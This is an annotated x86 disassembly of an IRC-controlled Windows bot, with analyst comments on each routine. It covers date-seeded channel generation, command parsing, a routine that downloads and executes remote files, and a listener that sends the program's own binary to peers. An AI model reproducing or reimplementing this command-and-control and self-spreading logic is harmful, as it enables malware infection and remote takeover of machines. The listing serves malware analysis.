var_14C = byte ptr -14Ch var_12C = byte ptr -12Ch var_128 = byte ptr -128h sub esp, 14Ch push esi mov esi, ecx call sub_403680 ; rand sub eax, 3 and eax, 7 push eax lea eax, [esp+154h+var_14C] push eax call sub_402B30 lea ecx, [esp+158h+var_14C] lea edx, [esp+158h+var_12C] push ecx push offset aQuitS ; "QUIT %s\r\n" push edx call dword_4010E8 ; wsprintfA add esp, 14h lea eax, [esp+150h+var_12C] push 0 push eax call dword_4010B4 ; lstrlenA mov edx, [esi+5Ch] lea ecx, [esp+150h+var_128] push eax push ecx push edx call dword_401148 ; send mov eax, [esi+5Ch] push eax call dword_401140 ; closesocket xor eax, eax pop esi add esp, 14Ch retn sub_402230 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4022A0 proc near ; CODE XREF: sub_402590+1B2p var_140 = dword ptr -140h var_13C = dword ptr -13Ch var_3C = byte ptr -3Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset SEH_4022A0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 134h push ebx mov ebx, dword_401078 push esi push edi mov esi, ecx mov [ebp+var_10], esp mov [ebp+var_18], esi mov [ebp+var_28], offset aHi ; "hi :)" mov [ebp+var_24], offset aHehe ; "hehe" mov [ebp+var_20], offset aCool ; "cool!" mov [ebp+var_1C], offset aYo ; "yo!" 
call ebx ; GetTickCount mov [ebp+var_14], eax mov eax, [esi+5Ch] mov [ebp+var_140], 1 mov [ebp+var_13C], eax loc_402303: ; CODE XREF: sub_4022A0+1B4j call sub_402C70 test eax, eax jz short loc_402354 push 0 push 0 lea ecx, [ebp+var_140] push 0 push ecx push 1 call dword_40111C ; select cmp eax, 0FFFFFFFFh jz short loc_402354 mov [ebp+var_4], 0 call ebx ; GetTickCount mov ecx, [ebp+var_14] sub eax, ecx mov ecx, [ebp+arg_0] lea ecx, [ecx+ecx*2] lea ecx, [ecx+ecx*4] lea ecx, [ecx+ecx*4] lea ecx, [ecx+ecx*4] lea edx, [ecx+ecx*4] shl edx, 5 cmp eax, edx jbe short loc_402373 mov ecx, esi call sub_402230 loc_402354: ; CODE XREF: sub_4022A0+6Aj ; sub_4022A0+84j ... mov ecx, [esi+5Ch] push ecx call dword_401140 ; closesocket xor eax, eax mov ecx, [ebp+var_C] mov large fs:0, ecx pop edi pop esi pop ebx mov esp, ebp pop ebp retn 4 ; --------------------------------------------------------------------------- loc_402373: ; CODE XREF: sub_4022A0+ABj mov eax, [esi+2Ch] mov ecx, [esi+5Ch] push 0 push 20000h push eax push ecx call dword_401144 ; recv cmp eax, 0FFFFFFFFh mov [esi], eax jnz short loc_4023A7 loc_40238F: ; CODE XREF: UPX0:0040246Cj ; DATA XREF: sub_402459+Do mov ecx, [ebp+var_C] pop edi pop esi mov eax, 1 mov large fs:0, ecx pop ebx mov esp, ebp pop ebp retn 4 ; --------------------------------------------------------------------------- loc_4023A7: ; CODE XREF: sub_4022A0+EDj mov edx, [esi+2Ch] push 64h mov byte ptr [eax+edx], 0 call dword_4010B8 ; Sleep mov eax, [esi+2Ch] mov ecx, esi push eax call sub_402090 mov ecx, [esi+2Ch] push ecx mov ecx, esi call sub_4028D0 call sub_403680 ; rand mov edi, eax and edi, 1Fh jnz short loc_4023F0 call sub_403680 ; rand and eax, 3 mov ecx, esi mov edx, [ebp+eax*4+var_28] lea eax, [esi+30h] push edx push eax call sub_402480 loc_4023F0: ; CODE XREF: sub_4022A0+136j cmp edi, 1 jnz short loc_402438 call sub_403680 ; rand add eax, 2 lea ecx, [ebp+var_3C] and eax, 7 push eax push ecx call sub_402B30 add esp, 8 lea edx, [ebp+var_3C] push 
edx call dword_4010B4 ; lstrlenA mov edi, eax sub edi, 3 call sub_403680 ; rand cdq idiv edi lea eax, [ebp+var_3C] lea ecx, [esi+30h] push eax push ecx mov ecx, esi mov [ebp+edx+var_3C], 20h call sub_402480 loc_402438: ; CODE XREF: sub_4022A0+153j mov [ebp+var_4], 0FFFFFFFFh call sub_402C70 test eax, eax jz loc_402354 push 64h call dword_4010B8 ; Sleep jmp loc_402303 sub_4022A0 endp ; =============== S U B R O U T I N E ======================================= sub_402459 proc near ; DATA XREF: UPX0:0040375Co mov edx, [ebp-18h] mov eax, [edx+5Ch] push eax call dword_401140 ; closesocket mov eax, offset loc_40238F retn sub_402459 endp ; --------------------------------------------------------------------------- jmp loc_40238F ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_402480 proc near ; CODE XREF: sub_4022A0+14Bp ; sub_4022A0+193p ... var_12C = byte ptr -12Ch var_128 = byte ptr -128h arg_0 = dword ptr 4 arg_4 = dword ptr 8 sub esp, 12Ch push ebx mov ebx, [esp+130h+arg_0] push ebp push esi mov esi, dword_4010B4 push edi mov edi, ecx push ebx call esi ; lstrlenA mov ebp, eax mov eax, [esp+13Ch+arg_4] push eax call esi ; lstrlenA add ebp, eax cmp ebp, 10Eh jle short loc_4024C4 pop edi pop esi pop ebp mov eax, 1 pop ebx add esp, 12Ch retn 8 ; --------------------------------------------------------------------------- loc_4024C4: ; CODE XREF: sub_402480+30j mov ecx, [esp+13Ch+arg_4] lea edx, [esp+13Ch+var_12C] push ecx push ebx push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n" push edx call dword_4010E8 ; wsprintfA add esp, 10h push 64h call dword_4010B8 ; Sleep lea eax, [esp+13Ch+var_12C] push 0 push eax call esi ; lstrlenA mov edx, [edi+5Ch] lea ecx, [esp+13Ch+var_128] push eax push ecx push edx call dword_401148 ; send pop edi pop esi pop ebp xor eax, eax pop ebx add esp, 12Ch retn 8 sub_402480 endp ; =============== S U B R O U T I N E 
=======================================
; sub_402510 - derive the day's channel name and command token from the date.
; The caller (sub_402590) pushes three pointers: a channel buffer, dword_404F40
; and dword_404F3C. IDA's arg_0/arg_4 labels are unreliable here because the
; cdecl pushes for srand/sub_402B30 are not cleaned until "add esp, 14h".
; Steps visible below:
;   1. GetSystemTime, then srand(w0*3 + w1 + w3) where w0, w1, w3 are the 16-bit
;      fields at offsets 0, 2 and 6 of the returned structure (year, month and
;      day in SYSTEMTIME layout).
;   2. First buffer  = '#' followed by 7 random lowercase letters.
;   3. Second buffer = 8 random lowercase letters (matched by sub_4028D0).
;   4. Third pointer receives rand() % 1Ah (passed by sub_4028D0 to sub_401D40).
;   5. srand(GetTickCount()) to reseed for later callers.
; Because the seed in step 1 depends only on the date, steps 2-4 yield the same
; values for every run on the same day, given the same rand implementation.
sub_402510 proc near ; CODE XREF: sub_402590+96p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
arg_0 = dword ptr 4
arg_4 = dword ptr 8
    sub esp, 10h
    lea eax, [esp+10h+var_10]
    push eax
    call dword_401084 ; GetSystemTime
    mov eax, [esp+14h+var_14]
    mov edx, [esp+14h+var_14+2]
    and eax, 0FFFFh
    and edx, 0FFFFh
    lea ecx, [eax+eax*2]
    mov eax, [esp+14h+var_E]
    add ecx, edx
    and eax, 0FFFFh
    add ecx, eax
    push ecx
    call sub_403686 ; srand
    mov eax, [esp+18h]
    push 7
    mov byte ptr [eax], 23h ; '#'
    inc eax
    push eax
    call sub_402B30
    mov ecx, [esp+20h+arg_0]
    push 8
    push ecx
    call sub_402B30
    add esp, 14h
    call sub_403680 ; rand
    cdq
    mov ecx, 1Ah
    idiv ecx
    mov eax, [esp+14h+arg_4]
    mov [eax], edx
    call dword_401078 ; GetTickCount
    push eax
    call sub_403686 ; srand
    add esp, 14h
    retn
sub_402510 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; sub_402590 - IRC client thread (started from loc_402E30 via sub_402B00).
; Never returns. Outer loop per iteration:
;   - sub_402510 computes the channel (var_24), token and key for today.
;   - Wait, polling every 1000 ms, until sub_402C70 reports connectivity.
;   - Select server off_404B0C with port 1A0Bh (6667) via sub_401DD0.
;   - Up to 16h registration attempts with sub_401E10; after each failure a
;     server is chosen from the table at off_404B0C using rand() % 0Bh.
;   - On success, JOIN the channel (sub_402120), retrying every 1000 ms while
;     it returns non-zero and connectivity holds.
;   - Run the session loop sub_4022A0 with a limit of rand()%320h + 578h.
;   - Afterwards QUIT if still connected, then sleep (rand()%1Eh)*60000 ms.
; The nickname in var_18 is 4..9 random letters; its first character is forced
; to '_' when dword_404FA0 is non-zero (that flag is set outside this chunk).
sub_402590 proc near ; DATA XREF: UPX0:00402EF0o
var_BC = byte ptr -0BCh
var_4C = byte ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_18 = byte ptr -18h
var_4 = dword ptr -4
    push ebp
    mov ebp, esp
    push 0FFFFFFFFh
    push offset SEH_402590
    mov eax, large fs:0
    push eax
    mov large fs:0, esp
    sub esp, 0B0h
    push ebx
    push esi
    push edi
    pusha
    rdtsc
    mov [ebp+var_28], eax ; low dword of the timestamp counter, mixed into the seed
    popa
    mov [ebp+var_2C], esp
    call dword_401078 ; GetTickCount
    mov ecx, [ebp+var_2C]
    imul ecx, [ebp+var_28]
    add eax, ecx
    push eax
    call sub_403686 ; srand
    call sub_403680 ; rand
    cdq
    mov ecx, 6
    idiv ecx
    add edx, 4
    push edx
    lea edx, [ebp+var_18]
    push edx
    call sub_402B30
    mov eax, dword_404FA0
    add esp, 0Ch
    test eax, eax
    jz short loc_4025FA
    mov [ebp+var_18], 5Fh ; '_'
loc_4025FA: ; CODE XREF: sub_402590+64j
    lea ecx, [ebp+var_BC]
    call sub_401DB0
    mov edi, dword_4010B8 ; edi = Sleep for the rest of the routine
    mov ebx, dword_401074 ; ebx = lstrcpyA
    mov [ebp+var_4], 0
loc_402618: ; CODE XREF: sub_402590+1BEj
    ; sub_402590+1F1j
    push offset dword_404F3C
    lea eax, [ebp+var_24]
    push offset dword_404F40
    push eax
    call sub_402510
    add esp, 0Ch
    call sub_402C70
    test eax, eax
    jnz short loc_402647
loc_402637: ; CODE XREF: sub_402590+B5j
    push 3E8h
    call edi ; Sleep
    call sub_402C70
    test eax, eax
    jz short loc_402637
loc_402647: ; CODE XREF: sub_402590+A5j
    mov ecx, off_404B0C
    push 1A0Bh
    push ecx
    lea ecx, [ebp+var_BC]
    call sub_401DD0
    xor esi, esi ; esi counts failed registration attempts
loc_402660: ; CODE XREF: sub_402590+151j
    call sub_402C70
    test eax, eax
    jz loc_40275F
    lea edx, [ebp+var_4C]
    push offset aQ ; "q"
    push edx
    call ebx ; lstrcpyA
    call sub_403680 ; rand
    cdq
    mov ecx, 7
    idiv ecx
    add edx, 5
    push edx
    lea edx, [ebp+var_4C]
    push edx
    call sub_402B30 ; writes from var_4C[0], so the "q" copied above is overwritten
    add esp, 8
    lea eax, [ebp+var_4C]
    lea ecx, [ebp+var_18]
    push eax
    push ecx
    call dword_4010B4 ; lstrlenA
    lea edx, [ebp+var_18]
    push eax
    push edx
    lea ecx, [ebp+var_BC]
    call sub_401E10
    test eax, eax
    jz short loc_4026E9
    push 1A0Bh
    call sub_403680 ; rand
    xor edx, edx
    mov ecx, 0Bh
    div ecx
    lea ecx, [ebp+var_BC]
    mov edx, off_404B0C[edx*4]
    push edx
    call sub_401DD0
    inc esi
    cmp esi, 16h
    jb loc_402660
    jmp short loc_40275F
; ---------------------------------------------------------------------------
loc_4026E9: ; CODE XREF: sub_402590+125j
    call sub_402C70
    test eax, eax
    jz short loc_40275F
    lea eax, [ebp+var_24]
    lea ecx, [ebp+var_BC]
    push eax
    call sub_402120
    test eax, eax
    jz short loc_402728
loc_402705: ; CODE XREF: sub_402590+196j
    push 3E8h
    call edi ; Sleep
    call sub_402C70
    test eax, eax
    jz short loc_402728
    lea ecx, [ebp+var_24]
    push ecx
    lea ecx, [ebp+var_BC]
    call sub_402120
    test eax, eax
    jnz short loc_402705
loc_402728: ; CODE XREF: sub_402590+173j
    ; sub_402590+183j
    call sub_403680 ; rand
    cdq
    mov ecx, 320h
    idiv ecx
    lea ecx, [ebp+var_BC]
    add edx, 578h
    push edx
    call sub_4022A0
    call sub_402C70
    test eax, eax
    jz loc_402618
    lea ecx, [ebp+var_BC]
    call sub_402230
loc_40275F: ; CODE XREF: sub_402590+D7j
    ; sub_402590+157j ...
    call sub_403680 ; rand
    cdq
    mov ecx, 1Eh
    idiv ecx
    lea eax, [edx+edx*2] ; same multiply-by-60000 chain as in sub_4022A0
    lea eax, [eax+eax*4]
    lea eax, [eax+eax*4]
    lea eax, [eax+eax*4]
    lea edx, [eax+eax*4]
    shl edx, 5
    push edx
    call edi ; Sleep
    jmp loc_402618
sub_402590 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402790 - download a URL to a randomly named file and run it.
; In:   arg_0 = URL string (cdecl, one argument)
; Out:  eax = 0 done, 1 InternetOpenA failed, 2 CreateFileA failed,
;             3 InternetOpenUrlA failed
; The file is <system directory>\<6 random letters>.exe, opened with access
; 40000000h and creation disposition 2. One InternetReadFile call of at most
; 100000h bytes fills a buffer from sub_403640, which is written out and then
; launched through sub_402B70 with show value 5.
; NOTE(review): the results of InternetReadFile and WriteFile are not checked,
; and no integrity or signature check on the downloaded data is visible in
; this routine; the Internet handles are not closed in the visible code.
; The var_108/var_104 labels differ only through IDA's stack tracking.
sub_402790 proc near ; CODE XREF: sub_4028D0+FAp
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 4
    sub esp, 10Ch
    push ebx
    push esi
    push edi
    push 0
    push 0
    push 0
    push 1
    push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
    call dword_4010F8 ; InternetOpenA
    mov ebx, eax
    test ebx, ebx
    jnz short loc_4027C1
    pop edi
    pop esi
    mov eax, 1
    pop ebx
    add esp, 10Ch
    retn
; ---------------------------------------------------------------------------
loc_4027C1: ; CODE XREF: sub_402790+20j
    lea eax, [esp+118h+var_104]
    push 104h
    push eax
    call dword_40109C ; GetSystemDirectoryA
    mov esi, dword_4010BC
    lea ecx, [esp+118h+var_104]
    push offset asc_404D18 ; "\\"
    push ecx
    call esi ; lstrcatA
    lea edx, [esp+118h+var_104]
    push 6
    push edx
    call dword_4010B4 ; lstrlenA
    lea eax, [esp+eax+120h+var_108] ; end of the path built so far
    push eax
    call sub_402B30 ; append 6 random letters
    add esp, 8
    lea ecx, [esp+11Ch+var_108]
    push offset a_exe ; ".exe"
    push ecx
    call esi ; lstrcatA
    push 0
    push 0
    push 2
    push 0
    push 0
    lea edx, [esp+12Ch+var_104]
    push 40000000h
    push edx
    call dword_401090 ; CreateFileA
    mov edi, eax
    cmp edi, 0FFFFFFFFh
    jnz short loc_402839
    pop edi
    pop esi
    mov eax, 2
    pop ebx
    add esp, 10Ch
    retn
; ---------------------------------------------------------------------------
loc_402839: ; CODE XREF: sub_402790+98j
    mov eax, [esp+118h+arg_0]
    push 0
    push 0
    push 0
    push 0
    push eax
    push ebx
    call dword_4010F0 ; InternetOpenUrlA
    mov ebx, eax
    test ebx, ebx
    jnz short loc_40286C
    push edi
    call dword_401088 ; CloseHandle
    pop edi
    pop esi
    mov eax, 3
    pop ebx
    add esp, 10Ch
    retn
; ---------------------------------------------------------------------------
loc_40286C: ; CODE XREF: sub_402790+C4j
    push 100000h
    call sub_403640
    add esp, 4
    lea ecx, [esp+118h+var_10C]
    mov esi, eax
    push ecx
    push 100000h
    push esi
    push ebx
    call dword_4010F4 ; InternetReadFile
    mov eax, [esp+118h+var_10C] ; number of bytes read
    lea edx, [esp+118h+var_108]
    push 0
    push edx
    push eax
    push esi
    push edi
    call dword_40108C ; WriteFile
    push edi
    call dword_401088 ; CloseHandle
    lea ecx, [esp+118h+var_104]
    push 5
    push ecx
    call sub_402B70 ; CreateProcessA wrapper
    push esi
    call sub_403660
    add esp, 0Ch
    xor eax, eax
    pop edi
    pop esi
    pop ebx
    add esp, 10Ch
    retn
sub_402790 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_4028D0 - parse received channel text for operator commands.
; In:   ecx = connection object (saved in var_268), arg_0 = received text
; Part 1 (command): the text must contain the 8-character token at
; dword_404F40 (set by sub_402510) and be longer than 0Ah from that point.
; Two '|'-terminated fields follow the token; each is passed through
; sub_401D40 together with the value at dword_404F3C (sub_401D40 is outside
; this chunk; presumably a decode step - confirm). Field 1 -> var_200 is the
; command, field 2 -> var_100 its argument:
;   "e"  if the message is shorter than 0FFh and more than 927C0h ms
;        (10 minutes) have passed since dword_404F60: save the raw message plus
;        "|" in dword_404E38, call sub_402790(var_100); on success record the
;        time, set dword_404F38 = 1 and send "-1" to the joined channel.
;   "i"  send "%d,%d,5" formatted from dword_404F68 and dword_404F9C.
;   "q"  only when dword_404F38 is set: QUIT (sub_402230) and ExitProcess(0).
; Part 2 (relay): when dword_404F38 is set and the text contains "JOIN", take
; the nick between the preceding ':' and the following '!' (shorter than 64h)
; and PRIVMSG the saved message in dword_404E38 to that nick.
; The routine temporarily writes NUL over '|' and '!' separators in the
; caller's buffer and restores them afterwards.
sub_4028D0 proc near ; CODE XREF: sub_4022A0+127p
var_268 = dword ptr -268h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 4
    sub esp, 268h
    push ebx
    push ebp
    mov ebp, [esp+270h+arg_0]
    push esi
    push edi
    push offset dword_404F40
    mov [esp+27Ch+var_268], ecx
    push ebp
    call sub_4036C6 ; strstr
    mov edi, eax
    add esp, 8
    test edi, edi
    jz loc_402A73
    push edi
    call dword_4010B4 ; lstrlenA
    cmp eax, 0Ah
    jle loc_402A73
    lea ebx, [edi+8] ; first field starts 8 bytes after the token match
    push 7Ch
    push ebx
    call sub_4036C0 ; strchr
    mov esi, eax
    add esp, 8
    test esi, esi
    jz loc_402A73
    mov byte ptr [esi], 0
    mov eax, dword_404F3C
    push eax
    lea ecx, [esp+27Ch+var_200]
    push ebx
    push ecx
    call sub_401D40
    mov byte ptr [esi], 7Ch
    inc esi
    push 7Ch
    push esi
    call sub_4036C0 ; strchr
    mov ebx, eax
    add esp, 14h
    test ebx, ebx
    jz loc_402A73
    mov byte ptr [ebx], 0
    mov edx, dword_404F3C
    push edx
    lea eax, [esp+27Ch+var_100]
    push esi
    push eax
    call sub_401D40
    mov ebp, dword_4010C4 ; ebp = lstrcmpA from here on
    add esp, 0Ch
    lea ecx, [esp+278h+var_200]
    push offset aE ; "e"
    push ecx
    call ebp ; lstrcmpA
    test eax, eax
    jnz short loc_4029FD
    push edi
    call dword_4010B4 ; lstrlenA
    cmp eax, 0FFh
    jge short loc_4029FD
    mov esi, dword_401078
    call esi ; GetTickCount
    sub eax, dword_404F60
    cmp eax, 927C0h
    jbe short loc_4029FD
    push edi
    push offset dword_404E38
    call dword_401074 ; lstrcpyA
    push offset asc_404D68 ; "|"
    push offset dword_404E38
    call dword_4010BC ; lstrcatA
    lea edx, [esp+278h+var_100]
    push edx
    call sub_402790
    add esp, 4
    test eax, eax
    jnz short loc_4029FD
    call esi ; GetTickCount
    mov esi, [esp+278h+var_268]
    mov dword_404F60, eax
    push offset a1 ; "-1"
    mov ecx, esi
    lea eax, [esi+30h]
    mov dword_404F38, 1
    push eax
    call sub_402480
    jmp short loc_402A01
; ---------------------------------------------------------------------------
loc_4029FD: ; CODE XREF: sub_4028D0+B1j
    ; sub_4028D0+BFj ...
    mov esi, [esp+278h+var_268]
loc_402A01: ; CODE XREF: sub_4028D0+12Bj
    lea ecx, [esp+278h+var_200]
    push offset aI ; "i"
    push ecx
    call ebp ; lstrcmpA
    test eax, eax
    jnz short loc_402A41
    mov edx, dword_404F9C
    mov eax, dword_404F68
    push edx
    push eax
    lea ecx, [esp+280h+var_264]
    push offset aDD5 ; "%d,%d,5"
    push ecx
    call dword_4010E8 ; wsprintfA
    add esp, 10h
    lea edx, [esp+278h+var_264]
    lea eax, [esi+30h]
    mov ecx, esi
    push edx
    push eax
    call sub_402480
loc_402A41: ; CODE XREF: sub_4028D0+13Fj
    lea ecx, [esp+278h+var_200]
    push offset aQ ; "q"
    push ecx
    call ebp ; lstrcmpA
    test eax, eax
    jnz short loc_402A69
    mov eax, dword_404F38
    test eax, eax
    jz short loc_402A69
    mov ecx, esi
    call sub_402230
    push 0
    call dword_4010C0 ; ExitProcess
loc_402A69: ; CODE XREF: sub_4028D0+17Fj
    ; sub_4028D0+188j
    mov ebp, [esp+278h+arg_0]
    mov byte ptr [ebx], 7Ch ; restore the second '|'
loc_402A73: ; CODE XREF: sub_4028D0+27j
    ; sub_4028D0+37j ...
    mov eax, dword_404F38
    test eax, eax
    jz short loc_402AE7
    push offset aJoin ; "JOIN"
    push ebp
    call sub_4036C6 ; strstr
    add esp, 8
    test eax, eax
    jz short loc_402AE7
    lea esi, [eax-1]
    cmp esi, ebp
    jb short loc_402A9F
; Scan backwards from the "JOIN" match towards the start of the text for ':'.
loc_402A95: ; CODE XREF: sub_4028D0+1CDj
    cmp byte ptr [esi], 3Ah
    jz short loc_402AA4
    dec esi
    cmp esi, ebp
    jnb short loc_402A95
loc_402A9F: ; CODE XREF: sub_4028D0+1C3j
    cmp byte ptr [esi], 3Ah ; reached with esi below the text start, so this reads one byte before it
    jnz short loc_402AE7
loc_402AA4: ; CODE XREF: sub_4028D0+1C8j
    lea ebx, [esi+1]
    push 21h
    push ebx
    call sub_4036C0 ; strchr
    mov edi, eax
    add esp, 8
    test edi, edi
    jz short loc_402AE7
    mov edx, edi
    sub edx, esi
    dec edx
    cmp edx, 64h ; var_264 spans 64h bytes up to var_200
    jge short loc_402AE7
    lea eax, [esp+278h+var_264]
    push ebx
    push eax
    mov byte ptr [edi], 0
    call dword_401074 ; lstrcpyA
    lea ecx, [esp+278h+var_264]
    push offset dword_404E38
    push ecx
    mov ecx, [esp+280h+var_268]
    call sub_402480
    mov byte ptr [edi], 21h ; restore '!'
loc_402AE7: ; CODE XREF: sub_4028D0+1AAj
    ; sub_4028D0+1BCj ...
    pop edi
    pop esi
    pop ebp
    pop ebx
    add esp, 268h
    retn 4
sub_4028D0 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402B00 - start a thread and immediately close its handle.
; In:   arg_0 = thread start address, arg_4 = thread parameter (cdecl)
; Out:  eax = result of CloseHandle
; The arg_4 stack slot is reused to receive the thread id. The CreateThread
; result is passed to CloseHandle without a check.
sub_402B00 proc near ; CODE XREF: sub_402CF0+128p
    ; UPX0:00402ED9p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
    mov ecx, [esp+arg_4]
    mov edx, [esp+arg_0]
    lea eax, [esp+arg_4]
    push eax
    push 0
    push ecx
    push edx
    push 0
    push 0
    call dword_4010AC ; CreateThread
    push eax
    call dword_401088 ; CloseHandle
    retn
sub_402B00 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402B30 - fill a buffer with random lowercase letters.
; In:   arg_0 = destination, arg_4 = count n (cdecl)
; Writes n bytes of 'a' + rand() % 1Ah followed by a NUL at dest[n]. For
; n <= 0 only the NUL is written, still at dest[n], so a negative n writes
; before the buffer.
sub_402B30 proc near ; CODE XREF: sub_401E10+8Ep
    ; sub_401E10+164p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
    push esi
    push edi
    mov edi, [esp+8+arg_4]
    xor esi, esi
    test edi, edi
    jle short loc_402B61
    push ebx
    mov ebx, [esp+0Ch+arg_0]
loc_402B41: ; CODE XREF: sub_402B30+27j
    call sub_403680 ; rand
    cdq
    mov ecx, 1Ah
    idiv ecx
    add dl, 61h
    mov [esi+ebx], dl
    inc esi
    cmp esi, edi
    jl short loc_402B41
    mov byte ptr [ebx+edi], 0
    pop ebx
    pop edi
    pop esi
    retn
; ---------------------------------------------------------------------------
loc_402B61: ; CODE XREF: sub_402B30+Aj
    mov edx, [esp+8+arg_0]
    mov byte ptr [edx+edi], 0
    pop edi
    pop esi
    retn
sub_402B30 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402B70 - launch a command line with CreateProcessA.
; In:   arg_0 = command line, arg_4 = 16-bit value stored at offset 30h of the
;       startup structure (cdecl)
; Out:  eax = CreateProcessA result
; The 44h-byte structure at var_44 is zeroed and its first dword set to 44h.
; Both handles written to the structure at var_54 are closed afterwards.
sub_402B70 proc near ; CODE XREF: sub_401340+1B5p
    ; sub_402790+11Fp
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_14 = word ptr -14h
arg_0 = dword ptr 4
arg_4 = word ptr 8
    sub esp, 54h
    push esi
    push edi
    mov ecx, 11h
    xor eax, eax
    lea edi, [esp+5Ch+var_44]
    lea edx, [esp+5Ch+var_44]
    rep stosd
    mov ax, [esp+5Ch+arg_4]
    lea ecx, [esp+5Ch+var_54]
    push ecx
    push edx
    push 0
    push 0
    push 0
    mov [esp+70h+var_14], ax
    mov eax, [esp+70h+arg_0]
    push 0
    push 0
    push 0
    push eax
    push 0
    mov [esp+84h+var_44], 44h
    call dword_4010C8 ; CreateProcessA
    mov ecx, [esp+5Ch+var_50]
    mov edi, dword_401088
    push ecx
    mov esi, eax
    call edi ; CloseHandle
    mov edx, [esp+5Ch+var_54]
    push edx
    call edi ; CloseHandle
    mov eax, esi
    pop edi
    pop esi
    add esp, 54h
    retn
sub_402B70 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402BE0 - turn a host string into a 32-bit address.
; In:   arg_0 = host string (cdecl)
; Out:  eax = address, or 0 when resolution fails
; Tries inet_addr first. A result of -1, or a result of 0 for a string that
; does not start with '0', falls back to gethostbyname and takes the first
; entry of the address list at offset 0Ch of the returned structure.
sub_402BE0 proc near ; CODE XREF: sub_401E10+1Fp
arg_0 = dword ptr 4
    push esi
    push edi
    mov edi, [esp+8+arg_0]
    push edi
    call dword_401114 ; inet_addr
    mov esi, eax
    cmp esi, 0FFFFFFFFh
    jz short loc_402BFD
    test esi, esi
    jnz short loc_402C0F
    cmp byte ptr [edi], 30h
    jz short loc_402C19
loc_402BFD: ; CODE XREF: sub_402BE0+12j
    push edi
    call dword_401118 ; gethostbyname
    test eax, eax
    jz short loc_402C0F
    mov eax, [eax+0Ch]
    mov ecx, [eax]
    mov esi, [ecx]
loc_402C0F: ; CODE XREF: sub_402BE0+16j
    ; sub_402BE0+26j
    cmp esi, 0FFFFFFFFh
    jnz short loc_402C19
    pop edi
    xor eax, eax
    pop esi
    retn
; ---------------------------------------------------------------------------
loc_402C19: ; CODE XREF: sub_402BE0+1Bj
    ; sub_402BE0+32j
    mov eax, esi
    pop edi
    pop esi
    retn
sub_402BE0 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402C20 - return the first address of the local host name.
; Out:  eax = 0 if gethostname fails, 100007Fh if gethostbyname fails,
;       otherwise the first entry of the returned address list
sub_402C20 proc near ; CODE XREF: sub_4031F0+5Cp
    ; UPX0:loc_4032CBp
var_34 = byte ptr -34h
    sub esp, 34h
    lea eax, [esp+34h+var_34]
    push 31h
    push eax
    call dword_40110C ; gethostname
    cmp eax, 0FFFFFFFFh
    jnz short loc_402C41
    call dword_401110 ; WSAGetLastError
    xor eax, eax
    add esp, 34h
    retn
; ---------------------------------------------------------------------------
loc_402C41: ; CODE XREF: sub_402C20+13j
    lea ecx, [esp+34h+var_34]
    push ecx
    call dword_401118 ; gethostbyname
    test eax, eax
    jnz short loc_402C59
    mov eax, 100007Fh
    add esp, 34h
    retn
; ---------------------------------------------------------------------------
loc_402C59: ; CODE XREF: sub_402C20+2Ej
    mov edx, [eax+0Ch]
    mov eax, [edx]
    mov eax, [eax]
    add esp, 34h
    retn
sub_402C20 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402C70 - connectivity check used as the gate for all network loops.
; Out:  eax = 1 if InternetGetConnectedState returns non-zero, else 0
; The neg/sbb/neg sequence normalises the API result to 0 or 1.
sub_402C70 proc near ; CODE XREF: sub_4022A0:loc_402303p
    ; sub_4022A0+19Fp ...
var_4 = byte ptr -4
    push ecx
    lea eax, [esp+4+var_4]
    push 0
    push eax
    call dword_4010FC ; InternetGetConnectedState
    neg eax
    sbb eax, eax
    neg eax
    pop ecx
    retn
sub_402C70 endp
; ---------------------------------------------------------------------------
    align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1.
PRESS KEYPAD "+" TO EXPAND]
    align 10h
; loc_402CA0 - per-connection thread started by sub_402CF0 via sub_402B00.
; In:   [esp+4] on entry = accepted socket
; Sends dword_404F6C bytes from the buffer at dword_404F64 (filled by
; sub_402CF0 with this program's own file), waits 7D0h ms, increments the
; counter dword_404F68, shuts down and closes the socket, then ExitThread(0).
; The trailing xor/pop/retn follows the ExitThread call.
loc_402CA0: ; DATA XREF: sub_402CF0+123o
    mov eax, dword_404F6C
    mov ecx, dword_404F64
    push esi
    mov esi, [esp+8]
    push 0
    push eax
    push ecx
    push esi
    call dword_401148 ; send
    push 7D0h
    call dword_4010B8 ; Sleep
    push offset dword_404F68
    call dword_401070 ; InterlockedIncrement
    push 2
    push esi
    call dword_40113C ; shutdown
    push esi
    call dword_401140 ; closesocket
    push 0
    call dword_4010A0 ; ExitThread
    xor eax, eax
    pop esi
